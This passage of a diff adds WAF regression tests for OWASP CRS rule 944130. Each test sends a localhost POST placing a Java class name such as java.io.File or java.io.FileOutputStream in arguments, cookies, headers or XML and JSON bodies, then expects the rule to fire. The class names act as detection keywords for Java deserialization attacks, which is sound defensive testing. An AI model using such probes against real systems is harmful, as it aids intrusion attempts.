includes keyword java.io.CharArrayReader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "java.io.CharArrayReader=test" + output: + log_contains: "id \"944130\"" + - test_title: 944130-69 + desc: "Cookie test includes keyword java.io.CharArrayReader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=java.io.CharArrayReader + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-70 + desc: "Cookie name includes keyword java.io.CharArrayReader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: java.io.CharArrayReader=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-71 + desc: "Request header test includes keyword java.io.CharArrayReader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: java.io.CharArrayReader + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-72 + desc: "XML attribute value includes keyword java.io.CharArrayReader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-73 + desc: "XML element value includes keyword java.io.CharArrayReader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "java.io.CharArrayReader" + output: + log_contains: "id \"944130\"" + - test_title: 944130-74 + desc: "Nested XML element value includes keyword java.io.CharArrayReader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "java.io.CharArrayReader" + output: + log_contains: "id \"944130\"" + - test_title: 944130-75 + desc: "Content-Type text/plain includes keyword java.io.CharArrayReader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=java.io.CharArrayReader" + output: + log_contains: "id \"944130\"" + - test_title: 944130-76 + desc: "Content-Type application/json arg value includes keyword java.io.CharArrayReader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"java.io.CharArrayReader\"}" + output: + log_contains: "id \"944130\"" + - test_title: 944130-77 + desc: "Content-Type application/json arg name includes keyword java.io.CharArrayReader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"java.io.CharArrayReader\": \"test\"}" + output: + log_contains: "id \"944130\"" + - test_title: 944130-78 + desc: "Argument test includes keyword java.io.DataInputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=java.io.DataInputStream" + output: + log_contains: "id \"944130\"" + - test_title: 944130-79 + desc: "Argument name includes keyword java.io.DataInputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "java.io.DataInputStream=test" + output: + log_contains: "id \"944130\"" + - test_title: 944130-80 + desc: "Cookie test includes keyword java.io.DataInputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=java.io.DataInputStream + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-81 + desc: "Cookie name includes keyword java.io.DataInputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: java.io.DataInputStream=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-82 + desc: "Request header test includes keyword java.io.DataInputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: java.io.DataInputStream + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-83 + desc: "XML attribute value includes keyword java.io.DataInputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-84 + desc: "XML element value includes keyword java.io.DataInputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "java.io.DataInputStream" + output: + log_contains: "id \"944130\"" + - test_title: 944130-85 + desc: "Nested XML element value includes keyword java.io.DataInputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "java.io.DataInputStream" + output: + log_contains: "id \"944130\"" + - test_title: 944130-86 + desc: "Content-Type text/plain includes keyword java.io.DataInputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=java.io.DataInputStream" + output: + log_contains: "id \"944130\"" + - test_title: 944130-87 + desc: "Content-Type application/json arg value includes keyword java.io.DataInputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"java.io.DataInputStream\"}" + output: + log_contains: "id \"944130\"" + - test_title: 944130-88 + desc: "Content-Type application/json arg name includes keyword java.io.DataInputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"java.io.DataInputStream\": \"test\"}" + output: + log_contains: "id \"944130\"" + - test_title: 944130-89 + desc: "Argument test includes keyword java.io.File" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=java.io.File" + output: + log_contains: "id \"944130\"" + - test_title: 944130-90 + desc: "Argument name includes keyword java.io.File" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "java.io.File=test" + output: + log_contains: "id \"944130\"" + - test_title: 944130-91 + desc: "Cookie test includes keyword java.io.File" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=java.io.File + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-92 + desc: "Cookie name includes keyword java.io.File" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: java.io.File=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-93 + desc: "Request header test includes keyword java.io.File" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: java.io.File + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-94 + desc: "XML attribute value includes keyword java.io.File" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-95 + desc: "XML element value includes keyword java.io.File" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "java.io.File" + output: + log_contains: "id \"944130\"" + - test_title: 944130-96 + desc: "Nested XML element value includes keyword java.io.File" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "java.io.File" + output: + log_contains: "id \"944130\"" + - test_title: 944130-97 + desc: "Content-Type text/plain includes keyword java.io.File" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=java.io.File" + output: + log_contains: "id \"944130\"" + - test_title: 944130-98 + desc: "Content-Type application/json arg value includes keyword java.io.File" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"java.io.File\"}" + output: + log_contains: "id \"944130\"" + - test_title: 944130-99 + desc: "Content-Type application/json arg name includes keyword java.io.File" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"java.io.File\": \"test\"}" + output: + log_contains: "id \"944130\"" + - test_title: 944130-100 + desc: "Argument test includes keyword java.io.FileOutputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=java.io.FileOutputStream" + output: + log_contains: "id \"944130\"" + - test_title: 944130-101 + desc: "Argument name includes keyword java.io.FileOutputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "java.io.FileOutputStream=test" + output: + log_contains: "id \"944130\"" + - test_title: 944130-102 + desc: "Cookie test includes keyword java.io.FileOutputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=java.io.FileOutputStream + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-103 + desc: "Cookie name includes keyword java.io.FileOutputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: java.io.FileOutputStream=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-104 + desc: "Request header test includes keyword java.io.FileOutputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: java.io.FileOutputStream + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-105 + desc: "XML attribute value includes keyword java.io.FileOutputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-106 + desc: "XML element value includes keyword java.io.FileOutputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "java.io.FileOutputStream" + output: + log_contains: "id \"944130\"" + - test_title: 944130-107 + desc: "Nested XML element value includes keyword java.io.FileOutputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "java.io.FileOutputStream" + output: + log_contains: "id \"944130\"" + - test_title: 944130-108 + desc: "Content-Type text/plain includes keyword java.io.FileOutputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=java.io.FileOutputStream" + output: + log_contains: "id \"944130\"" + - test_title: 944130-109 + desc: "Content-Type application/json arg value includes keyword java.io.FileOutputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"java.io.FileOutputStream\"}" + output: + log_contains: "id \"944130\"" + - test_title: 944130-110 + desc: "Content-Type application/json arg name includes keyword java.io.FileOutputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"java.io.FileOutputStream\": \"test\"}" + output: + log_contains: "id \"944130\"" + - test_title: 944130-111 + desc: "Argument test includes keyword java.io.FilterInputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=java.io.FilterInputStream" + output: + log_contains: "id \"944130\"" + - test_title: 944130-112 + desc: "Argument name includes keyword java.io.FilterInputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "java.io.FilterInputStream=test" + output: + log_contains: "id \"944130\"" + - test_title: 944130-113 + desc: "Cookie test includes keyword java.io.FilterInputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=java.io.FilterInputStream + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-114 + desc: "Cookie name includes keyword java.io.FilterInputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: java.io.FilterInputStream=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-115 + desc: "Request header test includes keyword java.io.FilterInputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: java.io.FilterInputStream + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-116 + desc: "XML attribute value includes keyword java.io.FilterInputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-117 + desc: "XML element value includes keyword java.io.FilterInputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "java.io.FilterInputStream" + output: + log_contains: "id \"944130\"" + - test_title: 944130-118 + desc: "Nested XML element value includes keyword java.io.FilterInputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "java.io.FilterInputStream" + output: + log_contains: "id \"944130\"" + - test_title: 944130-119 + desc: "Content-Type text/plain includes keyword java.io.FilterInputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=java.io.FilterInputStream" + output: + log_contains: "id \"944130\"" + - test_title: 944130-120 + desc: "Content-Type application/json arg value includes keyword java.io.FilterInputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"java.io.FilterInputStream\"}" + output: + log_contains: "id \"944130\"" + - test_title: 944130-121 + desc: "Content-Type application/json arg name includes keyword java.io.FilterInputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + 